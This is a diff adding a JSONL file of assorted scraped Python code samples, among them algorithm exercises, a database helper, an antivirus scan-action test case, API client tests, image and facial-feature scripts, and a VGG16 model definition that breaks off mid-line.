diff --git "a/4714.jsonl" "b/4714.jsonl"
new file mode 100644
--- /dev/null
+++ "b/4714.jsonl"
@@ -0,0 +1,677 @@
+{"seq_id":"14230913","text":"# 자연수 N에 몇 번의 연산을 통해 다른 자연수 M을 만든다.\n# +1, -1, *2, -10 -> 4가지 연산이 있을 때,\n# 최소 몇번의 연산을 거쳐야 M을 만들 수 있는가?\n\n# N =2, M=7\n# (2+1)*2+1= 7 최소 3번의 연산 필요하다.\n\n# 2 7 -> 3번\n# 3 15 -> 4번\n# 36 1007 -> 8번\n\nfrom collections import deque\n\ndef operation():\n global result\n while Q:\n front, check = Q.popleft()\n if front == M:\n result = check\n return\n for i in range(4):\n if i == 0:\n if 1<= front + 1 <= 1000000 and visited[front+1] == False:\n Q.append((front+1, check+1))\n visited[front+1] = True\n elif i == 1:\n if 1<= front-1 <= 1000000 and visited[front-1] == False:\n Q.append((front-1, check+1))\n visited[front-1] = True\n elif i == 2:\n if 1 <= front * 2 <= 1000000 and visited[front*2] == False:\n Q.append((front*2, check+1))\n visited[front*2] = True\n elif i == 3:\n if i<= front-10 <=1000000 and visited[front-10] ==False:\n Q.append((front-10, check+1))\n visited[front-10] = True\n\nT = int(input())\nfor tc in range(1, T+1):\n N, M = map(int, input().split())\n result = 0\n visited = [False] * 1000001\n Q = deque()\n Q.append((N, 0))\n operation()\n\n print(\"#{} {}\".format(tc, result))","sub_path":"SWEA/advanced/그래프기본과 탐색/연산.py","file_name":"연산.py","file_ext":"py","file_size_in_byte":1514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"636699037","text":"def get_checksum(spreadsheet):\n \"\"\"\n :param spreadsheet: list: of lists of numbers\n :return: sum of the differences between max & min in each row\n \"\"\"\n cumulative_checksum = 0\n for row in spreadsheet:\n diff = max(row) - min(row)\n cumulative_checksum += diff\n return cumulative_checksum\n\n\nif __name__ == '__main__':\n raw_spreadsheet = open('raw_spreadsheet.txt').readlines()\n spreadsheet = []\n for row in raw_spreadsheet:\n spreadsheet.append([int(v) for v in row.split('\t')])\n print('checksum: ' + str(get_checksum(spreadsheet)))\n","sub_path":"advent2017/day02/corruption_checksum.py","file_name":"corruption_checksum.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"47639769","text":"#! /usr/bin/python3\n\ndef count_twos(limit):\n \"\"\"\n Accept a number and count the number of appearances of \"2\" digits.\n \"\"\"\n\n count = 0\n\n for integer in range(limit + 1):\n count += str(integer).count('2')\n\n print('%i (is the number of appearances of \"2\" between 0 and %i)' \n % (count, limit))\n\n\nif __name__ == \"__main__\":\n import sys, timeit\n \n # Sanity check CLI command.\n if len(sys.argv) >= 2:\n print(timeit.timeit(\"count_twos(int(sys.argv[1]))\", setup=\"from __main__ import count_twos\", number=10))\n #count_twos(int(sys.argv[1]))\n else:\n print('Please enter a number.')\n","sub_path":"sendbloom/count_twos_v2.py","file_name":"count_twos_v2.py","file_ext":"py","file_size_in_byte":643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"239782669","text":"from sqlalchemy import Column, ForeignKey, Integer, String\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import relationship\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\n\n\nfrom Station import Station\n\nclass Database(object):\n\n def __init__(self):\n self.dbLocation = 'mysql+pymysql://root@localhost/MPD_MANAGEMENT'\n self.session = self.createSession()\n\n def createSession(self):\n engine = create_engine(self.dbLocation)\n Session = sessionmaker(bind=engine)\n session = Session()\n return session\n\n def storeStation(self, station):\n self.session.add(station)\n self.session.commit()\n\n def removeStation(self, station):\n (self.session.query(Station).filter_by(name=station.getName())).delete()\n self.session.commit()\n\n def getActiveStations(self):\n stations = self.session.query(Station).all()\n return stations\n\n def getStation(self, name):\n station = (self.session.query(Station).filter_by(name=name)).first()\n if station is not None:\n print('retrieving' + station.getName())\n return station\n raise NameError\n\n def checkStored(self, name):\n print('checking ' + name)\n if (self.session.query(Station).filter_by(name=name)).count():\n return True\n else:\n return False\n\n def getFreeSlot(self): # Poor time complexity, fix\n stations = self.session.query(Station).all()\n takenPorts = []\n for station in stations:\n takenPorts.append(int(station.httpPort) - 8000)\n\n for i in range(0, 100):\n if i not in takenPorts:\n return i\n\n \n def updateState(self, obj):\n self.session.merge(obj)\n self.session.commit()","sub_path":"Database.py","file_name":"Database.py","file_ext":"py","file_size_in_byte":1832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"34088460","text":"from components.ui.help_window import Ui_HelpWindow\nfrom components.window import SubWindow\n\n\nclass HelpDoc(SubWindow):\n\n def __init__(self, name='HelpDoc', parent=None):\n super().__init__(name, parent, Ui_HelpWindow())\n with open(\"Readme.md\", \"r\", encoding=\"utf-8\") as input_file:\n text = input_file.read()\n self.ui.textBrowser.setMarkdown(text)\n","sub_path":"components/help_doc.py","file_name":"help_doc.py","file_ext":"py","file_size_in_byte":382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"116188783","text":"#!/usr/bin/env python\n# Copyright (C) 2010 McAfee, Inc. All rights reserved.\n# TestcaseID: lsh-678\n# TestcaseDescription: Scanning a program/joke on read,write and execute with read,write and execute pe\n\nimport sys\nimport logging\nimport shutil\nimport subprocess\n# Add common folder into the sys path for module importing\nsys.path.append(\"../../Common\")\nsys.path.append('..')\nimport commonAntiMalwareFns\nimport commonOASFns\nimport commonFns\n# Import CommonTest module into current namespace\nfrom CommonTest import *\n\n# Get testcase name\ntestcaseName = sys.argv[0][:-3]\n\nclass TestCase(BaseTest):\n def __init__(self):\n logging.info(\"TestcaseID : lsh-678\")\n logging.info(\"Description : Scanning a program/joke on read,write and execute with read,write and execute pe\")\n\n def init(self):\n logging.info(\"Initializing testcase %s\" % testcaseName)\n # Call the common initialization check\n _retval = BaseTest.init(self)\n if _retval != 0 :\n return _retval\n self._joke_file_source = self.getConfig('PAYLOAD_PATH') + '/jokes/COMJOKE.COM'\n self._joke_file_target = os.path.dirname(os.path.abspath(sys.argv[0])) + '/lsh-678'\n self._original_dat =\"/opt/NAI/LinuxShield/engine/dat\"\n self._original_old_dat =\"/opt/NAI/LinuxShield/engine/dat_old\"\n self._eit_dat=self.getConfig('PAYLOAD_PATH') + '/jokes/dat'\n if self._cleanup() != 0 :\n return 1 \n if not os.path.exists(self._joke_file_source) :\n logging.error(\"Payload directory does not exist.\")\n return 1\n if not os.path.exists(self._joke_file_target) :\n os.mkdir(self._joke_file_target)\n if not commonOASFns.disableOAS() :\n logging.error(\"Failed to disable OAS for payload copy\")\n return 1\n try :\n logging.debug(\"Copying the payload\")\n shutil.move(self._original_dat,self._original_old_dat)\n shutil.copytree(self._eit_dat,self._original_dat)\n except :\n logging.error(\"Failed to copy the payload\")\n return 1\n return 0\n\n def execute(self):\n logging.info(\"Executing testcase %s\" % testcaseName)\n try :\n logging.debug(\"Copying the payload\")\n shutil.copy(self._joke_file_source, self._joke_file_target)\n except :\n logging.error(\"Failed to copy as expected\")\n return 1\n if not commonOASFns.setOASPrimaryAction(\"Rename\"):\n logging.error(\"failed to set primary action\")\n return 1\n if not commonOASFns.setOASSecondaryAction(\"Delete\"):\n logging.error(\"failed to set secondry action\")\n return 1\n if not commonOASFns.enableOAS() :\n logging.error(\"Failed to enable OAS after payload copy\")\n return 1\n self._jokefile_path= self._joke_file_target+\"/\"+\"COMJOKE.COM\"\n _p =subprocess.call([\"file\",self._jokefile_path])\n if _p!=0:\n logging.info(\"file comand failed as expected\")\n return 0\n return 0 \n \n def verify(self):\n if os.path.exists(self._jokefile_path):\n loggging.error(\"file has to be delete\")\n return 1\n logging.info(\"Verifying testcase %s\" % testcaseName)\n return 0\n\n def cleanup(self):\n logging.info(\"Performing cleanup for testcase %s\" % testcaseName)\n # Copy logs and clean them.\n foundCrash = 0\n foundCrash = commonFns.copyLogs()\n foundCrash = foundCrash + self._cleanup()\n commonFns.cleanLogs()\n\n if foundCrash != 0:\n logging.error(\"copylogs returned failure status. 
Maybe a product crash\")\n\n return foundCrash\n \n def _cleanup(self):\n _retval = 0\n logging.debug(\"Resetting to defaults\")\n if not commonAntiMalwareFns.resetToDefaults() :\n logging.error(\"Failed to reset to defaults\")\n _retval = 1\n logging.debug(\"Removing the macro target directory\")\n #if os.path.exists(self._joke_file_target) :\n #shutil.rmtree(self._joke_file_target)\n if os.path.exists(self._original_old_dat) :\n shutil.rmtree(self._original_dat)\t\t\n shutil.move(self._original_old_dat,self._original_dat)\n return _retval\n\n def __del__(self):\n pass\n\nif __name__ == \"__main__\":\n # Setup testcase\n setupTestcase(sys.argv)\n\n testObj = TestCase()\n\n # Perform testcase operations\n retVal = testObj.init()\n\n # Perform execute once initialization succeeds... \n if(retVal == 0):\n retVal = testObj.execute()\n\n # Once execution succeeds, perform verification...\n if(retVal == 0):\n retVal = testObj.verify()\n\n # Perform testcase cleanup\n retVal = retVal + testObj.cleanup()\n\n if(retVal == 0):\n resultString = \"PASS\"\n else:\n resultString = \"FAIL\"\n \n logging.info(\"Result of testcase %s: %s\" % (testcaseName, resultString) )\n sys.exit(retVal)\n","sub_path":"McAfee/src/VSEL - TestAutomation/Testcases/Antimalware/OAS/OAS_Scan_Actions_4.py","file_name":"OAS_Scan_Actions_4.py","file_ext":"py","file_size_in_byte":5032,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"528496236","text":"\n# 参考: https://qiita.com/takayg1/items/c811bd07c21923d7ec69\n# 単位元 と 結合法則 (交換則は成り立たなくてOK) が必要! それらがあれば O(N)→O(log N) にできる.)\nclass SegTree:\n \"\"\"\n init(init_val, ide_ele): 配列init_valで初期化 O(N)\n update(k, x): k番目の値をxに更新 O(logN)\n query(l, r): 区間[l, r)をsegfuncしたものを返す O(logN)\n \"\"\"\n def __init__(self, init_val, segfunc, ide_ele):\n \"\"\"\n init_val: 配列の初期値\n segfunc: 区間にしたい操作\n ide_ele: 単位元\n n: 要素数\n num: n以上の最小の2のべき乗\n tree: セグメント木(1-index)\n \"\"\"\n n = len(init_val)\n self.segfunc = segfunc\n self.ide_ele = ide_ele\n self.num = 1 << (n - 1).bit_length()\n self.tree = [ide_ele] * 2 * self.num\n # 配列の値を葉にセット\n for i in range(n):\n self.tree[self.num + i] = init_val[i]\n # 構築していく\n for i in range(self.num - 1, 0, -1):\n self.tree[i] = self.segfunc(self.tree[2 * i], self.tree[2 * i + 1])\n\n def update(self, k, x):\n \"\"\"\n k番目の値をxに更新\n k: index(0-index)\n x: update value\n \"\"\"\n k += self.num\n self.tree[k] = x\n while k > 1:\n self.tree[k >> 1] = self.segfunc(self.tree[k], self.tree[k ^ 1])\n k >>= 1\n\n def query(self, l, r):\n \"\"\"\n [l, r)のsegfuncしたものを得る\n l: index(0-index)\n r: index(0-index)\n \"\"\"\n res = self.ide_ele\n\n l += self.num\n r += self.num\n while l < r:\n if l & 1:\n res = self.segfunc(res, self.tree[l])\n l += 1\n if r & 1:\n res = self.segfunc(res, self.tree[r - 1])\n l >>= 1\n r >>= 1\n return res\n","sub_path":"library/SegTree.py","file_name":"SegTree.py","file_ext":"py","file_size_in_byte":1936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"270077549","text":"# use dummy head.\n# store previous. \n# head of reverse\n# next \n\n# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\nclass Solution:\n def reverseBetween(self, head: ListNode, m: int, n: int) -> ListNode:\n dummy = ListNode(None)\n dummy.next = head\n current = head\n prev = dummy\n nextt = dummy # record current's original next\n reverse_head = dummy # record prev to m'th \n reverse_last = dummy # record m'th\n counter = 1\n while current is not None:\n nextt = current.next\n if counter == m:\n reverse_head = prev\n reverse_last = current\n elif counter > m and counter < n:\n current.next = prev\n elif counter == n:\n # fix reverse head\n nextt = current.next\n current.next = prev \n reverse_head.next = current\n reverse_last.next = nextt\n break\n prev = current \n current = nextt\n counter += 1\n return dummy.next\n\nhead = ListNode(1)\nhead.next = ListNode(2)\nhead.next.next = ListNode(3)\nhead.next.next.next = ListNode(4)\nhead.next.next.next.next = ListNode(5)\nm = 2\nn = 4\nhead = Solution().reverseBetween(head, m, n)\nwhile head is not None:\n print(head.val)\n head = head.next","sub_path":"leetcode1-115/92. Reverse Linked List II.py","file_name":"92. Reverse Linked List II.py","file_ext":"py","file_size_in_byte":1429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"300682137","text":"import numpy as np\nimport cv2\nimport time\n\npath = \"img_test/space/\"\nname = \"space\" + str(4) + \".jpg\"\nimg_path = path + name\ndebug = True\n\nimg = cv2.imread(img_path)\nimg = cv2.resize(img, (700, 400))\ncopy = img\nshape = list(img.shape)\n\n\n#\nhsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\n# 105\nsensitivity = 90\nlower_white = np.array([0, 0, 255 - sensitivity])\nupper_white = np.array([255, sensitivity, 255])\nmask = cv2.inRange(hsv, lower_white, upper_white)\nimg = cv2.bitwise_and(img, img, mask=mask)\nimg = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\ncv2.imshow('test', img)\ncv2.waitKey()\ncv2.imwrite(path + 'result/' + name, img)\n","sub_path":"recognition/discover_space.py","file_name":"discover_space.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"399859597","text":"# Python script to calculate the distance measures (features) for all of the tracked face data\n# \nimport os\n\n# Supporting method to calculate distance between two points\ndef distance_between(n1, n2):\n\treturn (abs(n1[0] - n2[0])**2 + abs(n1[1] - n2[1])**2)**0.5\n\n# Supporting method to calculate midpoint of two points\ndef point_between(n1, n2):\n\tx = [n1[0], n2[0]]\n\ty = [n1[1], n2[1]]\n\treturn (abs(x[0] - x[1])/2 + min(x), abs(y[0] - y[1])/2 + min(y))\n\nemotions = {\n\t\"Angry\"\t\t: 1,\n\t\"Contempt\" \t: 2,\n\t\"Fear\" \t\t: 3,\n\t\"Happy\" \t: 4,\n\t\"Sadness\" \t: 5,\n\t\"Surprise\" \t: 6,\n\t\"Natural\" \t: 7 # Other\n}\n\ndata = {}\nfout = open(\"emotions.train\", \"w\")\nfor name in [\"Happy\", \"Sadness\", \"Surprise\", \"Angry\", \"Contempt\", \"Fear\", \"Natural\"]:\n\tdata[str(emotions[name])] = []\n\tfor sequence in os.listdir('Face data/' + name):\n\t\tdata[str(emotions[name])].append([])\n\t\tfor entry in open('Face data/' + name + \"/\" + sequence):\n\t\t\tx, y = [float(a) for a in entry.strip().replace(\" \", \" \").split(\" \")]\n\t\t\tdata[str(emotions[name])][-1].append((x, y))\n\nfor key in data:\n\tfor index in range(len(data[key])):\n\t\ti = 1\n\t\tvertex = [0.0] + data[key][index]\n\n\t\tfout.write(key)\n\n\t\tleft_eye = point_between(vertex[37], vertex[40])\n\t\tright_eye = point_between(vertex[43], vertex[46])\n\t\tbetween_eyes = distance_between(left_eye, right_eye)\n\t\tnose = point_between(vertex[31], vertex[34])\n\t\tfor x in range(1, 17 + 1):\n\t\t\tfout.write(\" \" + str(i) + \":\" + str(distance_between(vertex[x], nose) / between_eyes))\n\t\t\ti += 1\n\t\tfor x in range(18, 22 + 1):\n\t\t\tfout.write(\" \" + str(i) + \":\" + str(distance_between(vertex[x], left_eye) / between_eyes))\n\t\t\ti += 1\n\t\tfor x in range(23, 27 + 1):\n\t\t\tfout.write(\" \" + str(i) + \":\" + str(distance_between(vertex[x], right_eye) / between_eyes))\n\t\t\ti += 1\n\t\tfor x in range(32, 36 + 1):\n\t\t\tfout.write(\" \" + str(i) + \":\" + str(distance_between(vertex[x], nose) / between_eyes))\n\t\t\ti += 1\n\t\tfor x in range(37, 42 + 1):\n\t\t\tfout.write(\" \" + str(i) + \":\" + str(distance_between(vertex[x], left_eye) / between_eyes))\n\t\t\ti += 1\n\t\tfor x in range(43, 48 + 1):\n\t\t\tfout.write(\" \" + str(i) + \":\" + str(distance_between(vertex[x], right_eye) / between_eyes))\n\t\t\ti += 1\n\t\tfor x in range(49, 66 + 1):\n\t\t\tfout.write(\" \" + str(i) + \":\" + str(distance_between(vertex[x], nose) / between_eyes))\n\t\t\ti += 1\n\t\tfor x in range(0, 5):\n\t\t\tfout.write(\" \" + str(i) + \":\" + str(distance_between(vertex[18+x], vertex[27-x]) / between_eyes))\n\t\t\ti += 1\n\t\tfor x in range(23, 27 + 1):\n\t\t\tfout.write(\" \" + str(i) + \":\" + str(distance_between(vertex[x], nose) / between_eyes))\n\t\t\ti += 1\n\t\tfor x in range(18, 22 + 1):\n\t\t\tfout.write(\" \" + str(i) + \":\" + str(distance_between(vertex[x], nose) / between_eyes))\n\t\t\ti += 1\n\n\t\tfout.write(\" \" + str(i) + \":\" + str(distance_between(vertex[53], vertex[57]) / between_eyes))\n\t\ti += 1\n\t\tfout.write(\" \" + str(i) + \":\" + str(distance_between(vertex[52], vertex[58]) / between_eyes))\n\t\ti += 1\n\t\tfout.write(\" \" + str(i) + \":\" + str(distance_between(vertex[51], vertex[59]) / between_eyes))\n\t\ti += 1\n\t\tfout.write(\" \" + str(i) + \":\" + str(distance_between(vertex[49], vertex[55]) / between_eyes))\n\t\ti += 1\n\t\tfout.write(\" \" + str(i) + \":\" + str(distance_between(vertex[50], vertex[54]) / between_eyes))\n\t\ti 
+= 1\n\t\tfout.write(\" \" + str(i) + \":\" + str(distance_between(vertex[60], vertex[56]) / between_eyes))\n\t\ti += 1\n\t\tfout.write(\" \" + str(i) + \":\" + str(distance_between(vertex[61], vertex[66]) / between_eyes))\n\t\ti += 1\n\t\tfout.write(\" \" + str(i) + \":\" + str(distance_between(vertex[62], vertex[65]) / between_eyes))\n\t\ti += 1\n\t\tfout.write(\" \" + str(i) + \":\" + str(distance_between(vertex[63], vertex[64]) / between_eyes))\n\t\tfout.write(\"\\n\")\n","sub_path":"Classifiers/database-specific multi-class/rafd/calculatefeatures.py","file_name":"calculatefeatures.py","file_ext":"py","file_size_in_byte":3627,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"578203656","text":"\"\"\"\nPython Runtime Validation\n\"\"\"\n\nimport logging\nimport os\nimport subprocess\n\nfrom aws_lambda_builders.exceptions import MisMatchRuntimeError\n\nLOG = logging.getLogger(__name__)\n\n\nclass PythonRuntimeValidator(object):\n SUPPORTED_RUNTIMES = {\n \"python2.7\",\n \"python3.6\",\n \"python3.7\"\n }\n\n def __init__(self, runtime):\n self.language = \"python\"\n self.runtime = runtime\n self._valid_runtime_path = None\n\n def has_runtime(self):\n \"\"\"\n Checks if the runtime is supported.\n :param string runtime: Runtime to check\n :return bool: True, if the runtime is supported.\n \"\"\"\n return self.runtime in self.SUPPORTED_RUNTIMES\n\n def validate(self, runtime_path):\n \"\"\"\n Checks if the language supplied matches the required lambda runtime\n :param string runtime_path: runtime to check eg: /usr/bin/python3.6\n :raises MisMatchRuntimeError: Version mismatch of the language vs the required runtime\n \"\"\"\n if not self.has_runtime():\n LOG.warning(\"'%s' runtime is not \"\n \"a supported runtime\", self.runtime)\n return\n\n cmd = self._validate_python_cmd(runtime_path)\n\n p = subprocess.Popen(cmd,\n cwd=os.getcwd(),\n stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n p.communicate()\n if p.returncode != 0:\n raise MisMatchRuntimeError(language=self.language,\n required_runtime=self.runtime,\n runtime_path=runtime_path)\n else:\n self._valid_runtime_path = runtime_path\n return self._valid_runtime_path\n\n def _validate_python_cmd(self, runtime_path):\n major, minor = self.runtime.replace(self.language, \"\").split('.')\n cmd = [\n runtime_path,\n \"-c\",\n \"import sys; \"\n \"assert sys.version_info.major == {major} \"\n \"and sys.version_info.minor == {minor}\".format(\n major=major,\n minor=minor)]\n return cmd\n\n @property\n def validated_runtime_path(self):\n return self._valid_runtime_path if self._valid_runtime_path is not None else None\n","sub_path":"aws_lambda_builders/workflows/python_pip/validator.py","file_name":"validator.py","file_ext":"py","file_size_in_byte":2304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"491697259","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nPURPOSE: For testing meetup models\nAUTHOR: dylangregersen\nDATE: Mon Sep 15 00:52:58 2014\n\"\"\"\n# ########################################################################### #\n\n# import modules \n\nfrom __future__ import print_function, division, unicode_literals\nimport time\nimport unittest\n\nfrom mock import MagicMock\nfrom mock import Mock\nfrom mock import patch\nimport requests\n\nfrom meetup.api import MeetupClient\n\n\nMEETUP_KEY = \"abc123\"\n\n\n# ########################################################################### #\n\n\nclass MeetupClientTests(unittest.TestCase):\n \"\"\"Tests that ensure GET requests function correctly.\n \"\"\"\n\n def setUp(self):\n self.client = MeetupClient(api_key=MEETUP_KEY)\n self.json_body = MagicMock()\n self.response_headers = {\n 'X-RateLimit-Remaining': \"14\",\n 'X-RateLimit-Reset': \"2\"\n }\n self.mock_json = Mock(return_value=self.json_body)\n self.mock_response = Mock(\n headers=self.response_headers,\n json=self.mock_json\n )\n\n @patch.object(requests, \"get\")\n def test_invoke_get_calls_requests(self, mock_get):\n mock_get.return_value = self.mock_response\n result = self.client.invoke(\n meetup_method=\"2/groups\",\n params={\n \"member_id\": \"12345\"\n },\n method=\"GET\"\n )\n mock_get.assert_called_once_with(\n \"https://api.meetup.com/2/groups\"\n \"?page=1000\"\n \"&key=abc123\"\n \"&member_id=12345\"\n )\n self.mock_json.assert_called_once_with()\n self.assertIs(self.json_body, result)\n\n @patch.object(requests, \"post\")\n def test_invoke_post_calls_requests(self, mock_post):\n mock_post.return_value = self.mock_response\n result = self.client.invoke(\n meetup_method=\"2/groups\",\n params={\n \"name\": \"Awesome Team\"\n },\n method=\"POST\"\n )\n mock_post.assert_called_once_with(\n \"https://api.meetup.com/2/groups\",\n data={\n \"key\": \"abc123\",\n \"page\": 1000,\n \"name\": \"Awesome Team\"\n }\n )\n self.mock_json.assert_called_once_with()\n self.assertIs(self.json_body, result)\n\n @patch.object(requests, \"delete\")\n def test_invoke_delete_calls_requests(self, mock_delete):\n mock_delete.return_value = self.mock_response\n result = self.client.invoke(\n meetup_method=\"2/groups/awesome-team\",\n params={\n \"id\": 72\n },\n method=\"DELETE\"\n )\n mock_delete.assert_called_once_with(\n \"https://api.meetup.com/2/groups/awesome-team\",\n params={\n \"key\": \"abc123\",\n \"page\": 1000,\n \"id\": 72\n }\n )\n self.mock_json.assert_called_once_with()\n self.assertIs(self.json_body, result)\n\n @patch.object(time, \"sleep\")\n @patch.object(requests, \"get\")\n def test_hit_rate_limit_waits(self, mock_get, mock_sleep):\n mock_get.return_value = self.mock_response\n self.response_headers['X-RateLimit-Remaining'] = \"0\"\n self.response_headers['X-RateLimit-Reset'] = \"4\"\n self.client.invoke(\"2/groups/foo\")\n\n self.response_headers['X-RateLimit-Reset'] = \"2\"\n self.client.invoke(\"2/groups/bar\")\n self.assertEqual(2, len(mock_get.call_args_list))\n mock_sleep.assert_called_once_with(4)\n\n mock_sleep.reset_mock()\n self.client.invoke(\"2/groups/chew\")\n mock_sleep.assert_called_once_with(2)\n\n @patch.object(requests, \"get\")\n def test_get_next_page_uses_meta_to_fetch_next(self, mock_get):\n mock_get.return_value = self.mock_response\n result = self.client.get_next_page(\n {\n \"meta\": {\n \"next\": \"http://meetup.foo.co/page-2\"\n }\n }\n )\n mock_get.assert_called_once_with(\"http://meetup.foo.co/page-2\")\n 
self.mock_json.assert_called_once_with()\n self.assertIs(self.json_body, result)\n\n def test_get_next_page_no_next_is_none(self):\n result = self.client.get_next_page(\n {\n \"meta\": {\n \"prev\": \"http://fifo.com/1\"\n }\n }\n )\n self.assertIsNone(result)\n\n def test_get_next_page_no_meta_is_none(self):\n result = self.client.get_next_page({})\n self.assertIsNone(result)\n\n\n\n# ########################################################################### #\nif __name__ == \"__main__\":\n unittest.main()\n \n","sub_path":"meetup/tests/test_api.py","file_name":"test_api.py","file_ext":"py","file_size_in_byte":4741,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"623230834","text":"#takes the ATL zoo and converts it into .dsltrans files\n\nfrom ZipDownloader import ZipDownloader\nfrom ZipHandler import ZipHandler\nfrom ConvertATL2XMI import ConvertATL2XMI\nfrom RTEHandler import RTEHandler\nfrom ConvertATL2DSLTrans import ConvertATL2DSLTrans\n\nclass ZooConverter:\n\n def __init__(self, zip_dir, trans_dir):\n self.zip_dir = zip_dir\n self.trans_dir = trans_dir\n\n def download_zips(self, zoo_site):\n ZipDownloader(zoo_site, self.zip_dir)\n\n def separate_transformations(self):\n zh = ZipHandler(self.zip_dir, self.trans_dir)\n zh.unzip()\n\n def run_atl_to_xmi(self):\n cax = ConvertATL2XMI(self.trans_dir)\n cax.set_up()\n cax.convert()\n cax.tear_down()\n\n def run_types_trans(self):\n rte = RTEHandler(self.trans_dir)\n rte.run()\n\n def run_atl_to_dsltrans(self):\n catd = ConvertATL2DSLTrans(self.trans_dir)\n catd.set_up()\n catd.convert()\n catd.tear_down()\n\nif __name__ == \"__main__\":\n\n zoo_site = \"https://www.eclipse.org/atl/atlTransformations/\"\n zip_dir = \"./zip_dir\"\n trans_dir = \"./example_dir\"\n zc = ZooConverter(zip_dir, trans_dir)\n\n zc.download_zips(zoo_site)\n\n zc.separate_transformations()\n\n zc.run_atl_to_xmi()\n\n zc.run_types_trans()\n\n zc.run_atl_to_dsltrans()","sub_path":"converter/zoo_to_dsltrans.py","file_name":"zoo_to_dsltrans.py","file_ext":"py","file_size_in_byte":1323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"402133995","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Aug 15 09:15:07 2020\n\n@author: Frank\n\"\"\"\n\n\n############################################################\n# DES: Define VGG16 CNN and train model.\n# Once trained, export model to working directory.\n############################################################\n\n############################################################\n# Libraries:\n############################################################\n\nimport os\n#import scripts.set_working_dir as set_wd\nimport tensorflow as tf\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\nfrom tensorflow.keras.optimizers import RMSprop\nimport math\nfrom itertools import product\n\n#########################################################\n# Set Working Directory:\n# - Ensure RELATIVE working directory (so it can be replicated by any user)\n# - Ensure users can read data using either Windows or UNIX folders\n# - Working directory should be '.\\scripts' for windows or './scripts' for UNIX\n#########################################################\n\n#working_dir = set_wd.set_correct_working_dir()\n\n############################################################\n# Define LeNet model:\n# - Parameters to change:\n# - - Optimisation\n# - - Loss function\n############################################################\n\n#########################################\n# Define combinations of paramters:\n#########################################\n\n# Loss functions\nloss_fns = ['binary_crossentropy', 'mean_squared_error', 'mean_squared_logarithmic_error', 'sparse_categorical_crossentropy']\n\n# Optimisation for SGD learning rate:\nopts = [0.1, 0.01, 0.001]\n\n# combinations:\ncombos = list(product(loss_fns, opts))\n\ni = combos[1]\n\n#########################################\n# Define X models (X = len(loss_fns)*len(opts)\n#########################################\n\nfor i in combos:\n\n VGG16_cnn_model = tf.keras.models.Sequential()\n VGG16_cnn_model.add(Conv2D(input_shape=(224,224,3),filters=64,kernel_size=(3,3),padding=\"same\", activation=\"relu\"))\n VGG16_cnn_model.add(Conv2D(filters=64,kernel_size=(3,3),padding=\"same\", activation=\"relu\"))\n VGG16_cnn_model.add(MaxPool2D(pool_size=(2,2),strides=(2,2)))\n VGG16_cnn_model.add(Conv2D(filters=128, kernel_size=(3,3), padding=\"same\", activation=\"relu\"))\n VGG16_cnn_model.add(Conv2D(filters=128, kernel_size=(3,3), padding=\"same\", activation=\"relu\"))\n VGG16_cnn_model.add(MaxPool2D(pool_size=(2,2),strides=(2,2)))\n VGG16_cnn_model.add(Conv2D(filters=256, kernel_size=(3,3), padding=\"same\", activation=\"relu\"))\n VGG16_cnn_model.add(Conv2D(filters=256, kernel_size=(3,3), padding=\"same\", activation=\"relu\"))\n VGG16_cnn_model.add(Conv2D(filters=256, kernel_size=(3,3), padding=\"same\", activation=\"relu\"))\n VGG16_cnn_model.add(MaxPool2D(pool_size=(2,2),strides=(2,2)))\n VGG16_cnn_model.add(Conv2D(filters=512, kernel_size=(3,3), padding=\"same\", activation=\"relu\"))\n VGG16_cnn_model.add(Conv2D(filters=512, kernel_size=(3,3), padding=\"same\", activation=\"relu\"))\n VGG16_cnn_model.add(Conv2D(filters=512, kernel_size=(3,3), padding=\"same\", activation=\"relu\"))\n VGG16_cnn_model.add(MaxPool2D(pool_size=(2,2),strides=(2,2)))\n VGG16_cnn_model.add(Conv2D(filters=512, kernel_size=(3,3), padding=\"same\", activation=\"relu\"))\n VGG16_cnn_model.add(Conv2D(filters=512, kernel_size=(3,3), padding=\"same\", activation=\"relu\"))\n VGG16_cnn_model.add(Conv2D(filters=512, kernel_size=(3,3), 
